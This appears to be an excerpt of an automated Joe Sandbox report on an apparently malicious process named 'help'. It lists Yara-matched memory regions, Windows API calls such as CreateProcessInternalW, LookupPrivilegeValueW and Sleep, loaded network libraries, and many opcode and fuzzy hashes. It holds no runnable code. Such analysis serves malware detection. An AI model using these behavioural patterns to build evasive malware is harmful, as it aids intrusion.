                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 40c64ddc4b094c4fd66e304809df83c9d2ba92438c65e3a0de8e64bcd7423412
                                                                                                                                                                            • Instruction ID: 60752e7067ebee6bd6c35c1deb2b1dddc464834dedd631e9f8fe5d2328e51f40
                                                                                                                                                                            • Opcode Fuzzy Hash: 40c64ddc4b094c4fd66e304809df83c9d2ba92438c65e3a0de8e64bcd7423412
                                                                                                                                                                            • Instruction Fuzzy Hash: FB900225225104031905E55D0704507009687D7351351C4AAF1109550CD73188616131
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: bb745b401a809a488af931b1242ecd49203602bcd38f63949b0f44e08eb6ec9f
                                                                                                                                                                            • Instruction ID: c1de08fc1ab23e9ccfb9d194221bcfb71786c4a4d086a28d4d24f44fe88a3ccc
                                                                                                                                                                            • Opcode Fuzzy Hash: bb745b401a809a488af931b1242ecd49203602bcd38f63949b0f44e08eb6ec9f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B90022122590442EA00A56D4D14B07005587D2303F51C59EA0248554CCA2588616531
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 9ac1fc508dc7ade8ae431b2b1cc8520184fcd161963d288f4eb436e67a167439
                                                                                                                                                                            • Instruction ID: e36a621e7ffadc2ac54667ef9c76bb295872936fc29f4e5e109a1b152a5448d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ac1fc508dc7ade8ae431b2b1cc8520184fcd161963d288f4eb436e67a167439
                                                                                                                                                                            • Instruction Fuzzy Hash: CB90026135510842E900A15D4514B060055C7E3301F51C49EE1158554DC729CC527136
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 78c1af68234c9b973e840c29c4b26df0607f48b421b52b2fe42f284a80d87569
                                                                                                                                                                            • Instruction ID: 759edda97066939c01dff541c56808c3e1f75a3188882925c8340befe191e09a
                                                                                                                                                                            • Opcode Fuzzy Hash: 78c1af68234c9b973e840c29c4b26df0607f48b421b52b2fe42f284a80d87569
                                                                                                                                                                            • Instruction Fuzzy Hash: C590027121510802E940B15D4504746005587D2301F51C49AA5158554EC7698DD57675
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: c250b0e18336b6daf2d1fc648d26012c3675d5ad979def2b520dd6f374d42bea
                                                                                                                                                                            • Instruction ID: a4e0f7dfb8129de674bf1409dffc3f513b4cd07318c0a235bd60147c7041f1cf
                                                                                                                                                                            • Opcode Fuzzy Hash: c250b0e18336b6daf2d1fc648d26012c3675d5ad979def2b520dd6f374d42bea
                                                                                                                                                                            • Instruction Fuzzy Hash: 4690023121510813E911A15D4604707005987D2241F91C89BA0518558DD7668952B131
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 23c8e3ca8addbeb4ab40889a3f41222c9d20557bcef0dfdff64822f470c743c0
                                                                                                                                                                            • Instruction ID: 519f2644fea392ae1fd1d371638707b85c7bcce3ba9d9d0114613725fdefca1b
                                                                                                                                                                            • Opcode Fuzzy Hash: 23c8e3ca8addbeb4ab40889a3f41222c9d20557bcef0dfdff64822f470c743c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A900221256145526D45F15D4504507405697E2241791C49BA1508950CC6369856E631
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b8137430962999f719e6c7ad6b58ecf61fc55f1e616ed6e8569df208554bfbd9
                                                                                                                                                                            • Instruction ID: 28085ba6476cb7ea26774072421e73f3363ae51bc821efe8b68c720fdbe65d1f
                                                                                                                                                                            • Opcode Fuzzy Hash: b8137430962999f719e6c7ad6b58ecf61fc55f1e616ed6e8569df208554bfbd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9190022922710402E980B15D550860A005587D3202F91D89EA0109558CCA2588696331
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 2340568224-3887548279
                                                                                                                                                                            • Opcode ID: 396a834b736897f58417874c0d58b5acaa34f94d7fcc576a06da06ebf9390e48
                                                                                                                                                                            • Instruction ID: 8d9a733c251d3e730613b1cc37d02c9a12baf743d3affad0b7c430a2303c00a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 396a834b736897f58417874c0d58b5acaa34f94d7fcc576a06da06ebf9390e48
                                                                                                                                                                            • Instruction Fuzzy Hash: 1771A5F1D00209AADB21EBA4DC41FEEBBB9AF44784F00455DF709A2140EF74A7458FA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02F4B4EB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                                                            • Opcode ID: fcba2eef9ccf933e218e5768d2c8a11f292b249e9e66377281dab5df51b4a04d
                                                                                                                                                                            • Instruction ID: b931d4e33f0a6809ed0c0f965e40488352e8b6090992bdd02599ec1821277311
                                                                                                                                                                            • Opcode Fuzzy Hash: fcba2eef9ccf933e218e5768d2c8a11f292b249e9e66377281dab5df51b4a04d
                                                                                                                                                                            • Instruction Fuzzy Hash: DF317EB5A00604BBD724DFB4DC81FA7BBF8BB48748F00851EE65D4B285D7B0A544CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 02F4B4EB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                                                                            • Opcode ID: 3500c1ff209c44770320963b687f192c6e7a9c90c77ed46dc59d7caa987a83f0
                                                                                                                                                                            • Instruction ID: dd8d06f8a2cf66b80a18d6050b5b47aac7e82e0debd48e554bd7b69e4adb86b8
                                                                                                                                                                            • Opcode Fuzzy Hash: 3500c1ff209c44770320963b687f192c6e7a9c90c77ed46dc59d7caa987a83f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 5731D3B1E00204BBD714DFB4D881FEABBB8FB48748F00816AE61D4B285D7B0A544CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32(00000000,00000000,02F347C7,00000000), ref: 02F44D27
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID: @J7<
                                                                                                                                                                            • API String ID: 2538663250-2016760708
                                                                                                                                                                            • Opcode ID: e6fbc238c45f2f37feaf739124dd3904cb655b437e8addc070133c7cff007b3f
                                                                                                                                                                            • Instruction ID: 45c12d322f2f6570dfc40354b87c9511b14b1c64e29677d80d3baa0ccf62abd0
                                                                                                                                                                            • Opcode Fuzzy Hash: e6fbc238c45f2f37feaf739124dd3904cb655b437e8addc070133c7cff007b3f
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D312175A0060A9FDB10DFD8DC809EFB7B9BF88304B108559E615E7254DB75EE058BA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32(00000000,00000000,02F347C7,00000000), ref: 02F44D27
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID: @J7<
                                                                                                                                                                            • API String ID: 2538663250-2016760708
                                                                                                                                                                            • Opcode ID: 7406217a6c8752c5d87bcd1bf520979de88631eb5ed791f8eaacf6ae0f4977bd
                                                                                                                                                                            • Instruction ID: b23587b66310e12b1964c639df3d86379ec68b0d29be3ba77c06ae6be6df432a
                                                                                                                                                                            • Opcode Fuzzy Hash: 7406217a6c8752c5d87bcd1bf520979de88631eb5ed791f8eaacf6ae0f4977bd
                                                                                                                                                                            • Instruction Fuzzy Hash: C93141B5A0020A9FDB10DFD8D8809EFB7B9BF88304B108559E615EB254DB71EE05CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 02F3768A
                                                                                                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 02F376AB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                            • Opcode ID: 0609e4b7c8c1b02fffee96af3a8ff9c879d1e4c88a2ede72c0e8dbc7e1f04d34
                                                                                                                                                                            • Instruction ID: d03b72995f44d5932d93a80b510b3969a651626beeed7652369aded741f51ddf
                                                                                                                                                                            • Opcode Fuzzy Hash: 0609e4b7c8c1b02fffee96af3a8ff9c879d1e4c88a2ede72c0e8dbc7e1f04d34
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E01A271A802287BE721A6958C42FFEBB6DAB40B90F050518FF04BA1C0EBD469064BF5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 02F3F8B8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 30d78308174c8d3710ef9c00a618afaa4392ccecade2912a63ba685d82bbf539
                                                                                                                                                                            • Instruction ID: 3b677da637139904805c1240472dea0b42fdcfe2a49d272d53b57850dac31510
                                                                                                                                                                            • Opcode Fuzzy Hash: 30d78308174c8d3710ef9c00a618afaa4392ccecade2912a63ba685d82bbf539
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C5192B69103046BDB25EB64CC84FEB777DAF48340F004A99E75A97152EF70AB858F60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F3AC42
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                            • Opcode ID: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                                                                                                                                                            • Instruction ID: 82c48e442833351b68720be676e72d5a0d57e49cdb67ca32daf071dd077d418f
                                                                                                                                                                            • Opcode Fuzzy Hash: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                                                                                                                                                            • Instruction Fuzzy Hash: 32011EB5E0020DBBDF10DBE5DC41F9DB7799B54748F004295AA0C97241FA71E7548B91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02F4CB34
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                                            • Opcode ID: bec94458cd42806910d4d3acd5553c417a3fa2ad3fa69b939821d7d23a8d2164
                                                                                                                                                                            • Instruction ID: b5b935801a8141c9a63b1ebaa2889ce5a63881983c9840b15af1fe3f1bc2ab29
                                                                                                                                                                            • Opcode Fuzzy Hash: bec94458cd42806910d4d3acd5553c417a3fa2ad3fa69b939821d7d23a8d2164
                                                                                                                                                                            • Instruction Fuzzy Hash: 9401B2B2210108BFCB58DF89DC80EEB77ADAF8C754F118258BA0D97240C670E851CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02F4CB34
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                                            • Opcode ID: 67b4801cc9e007946cf2de4f7bf113db1f8f23bce19d7b0b374cb61264add63a
                                                                                                                                                                            • Instruction ID: 301b11983a806109e3b4313298fdde54ffad3a917e1494b0a80b4cd45474c818
                                                                                                                                                                            • Opcode Fuzzy Hash: 67b4801cc9e007946cf2de4f7bf113db1f8f23bce19d7b0b374cb61264add63a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01F2B2204148AFCB04DF99DC80DEB7BA9AF8D254F158259FA9D97241C630E851CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,DA03FB32,00000000,00000000,?,?,?,DA03FB32,?), ref: 02F4B5AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                            • Opcode ID: db8cae8b210e7ee44c1b274500cc9dfb76c6f2e2d86d0d702de0e5103afbc90e
                                                                                                                                                                            • Instruction ID: 0485a7ecc11cd182dee5518de684f6934c134f8363a3b80616d33b10eccba975
                                                                                                                                                                            • Opcode Fuzzy Hash: db8cae8b210e7ee44c1b274500cc9dfb76c6f2e2d86d0d702de0e5103afbc90e
                                                                                                                                                                            • Instruction Fuzzy Hash: 47E0923378131436E33061A99C02FABB78CDB84B65F140066FB0DEB2C1DAD5F50146E4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(02F469F6,?,02F4719D,02F4719D,?,02F469F6,?,?,?,?,?,00000000,00000005,00000206), ref: 02F4CA5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: df6601c4fa938440892edf3d2c471e8810c3767b6256e6a185f84a6a6d30c4d5
                                                                                                                                                                            • Instruction ID: 8ea788d46f8107a952b0b6924a272795fcee48520773ebb951e4e1b08262d9d5
                                                                                                                                                                            • Opcode Fuzzy Hash: df6601c4fa938440892edf3d2c471e8810c3767b6256e6a185f84a6a6d30c4d5
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF0A0353002186BDA20EBA8DC50EE7B79EEF85794F14859AFA885B201C971A905CBE1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F3DC42,02F3DC42,?,00000000,?,?), ref: 02F4CC00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: e7dd7b10fdc4d90a4fd07695763aa2b61e0cf164094e504a83b290d7e9fc7ec7
                                                                                                                                                                            • Instruction ID: 5c4347c96d5143d5c7723b364513c9967644f36069152c5020d00598baceea5d
                                                                                                                                                                            • Opcode Fuzzy Hash: e7dd7b10fdc4d90a4fd07695763aa2b61e0cf164094e504a83b290d7e9fc7ec7
                                                                                                                                                                            • Instruction Fuzzy Hash: F6E065B12512087BD714DF98DC81EE7776DEF85690F159555BA0C67241D570E8008AB0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,DA03FB32,00000000,00000000,?,?,?,DA03FB32,?), ref: 02F4B5AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                            • Opcode ID: 53fa50d7eb5dbff7b19a609d93be8a55ad6b0e0d9437e2c3ed43291ce22a0659
                                                                                                                                                                            • Instruction ID: d97e7377415a9a50023eefbea2cf70201a6a473eec2e3696f6785e2a412964a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 53fa50d7eb5dbff7b19a609d93be8a55ad6b0e0d9437e2c3ed43291ce22a0659
                                                                                                                                                                            • Instruction Fuzzy Hash: 78E09A3268130032E23022588C02FABB7988B84B64F140029FB0DAB2C1DAE5F90146A4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(02F43D02,?,?,02F43D02,00000000,?), ref: 02F3E30A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 39062ff23a36d6dfe8624dac98c7a8fc5e15a83962db71ea4cb7ae81496a11e5
                                                                                                                                                                            • Instruction ID: 5c5cd527c8d4f43e23110463ea4f994675a7adbb746b0627eac1ec3f37928fe0
                                                                                                                                                                            • Opcode Fuzzy Hash: 39062ff23a36d6dfe8624dac98c7a8fc5e15a83962db71ea4cb7ae81496a11e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE0867164020427FB2876A89C46F6A37588F48668F184694FA1CDB2C2D774F5414154
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02F4CA9D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
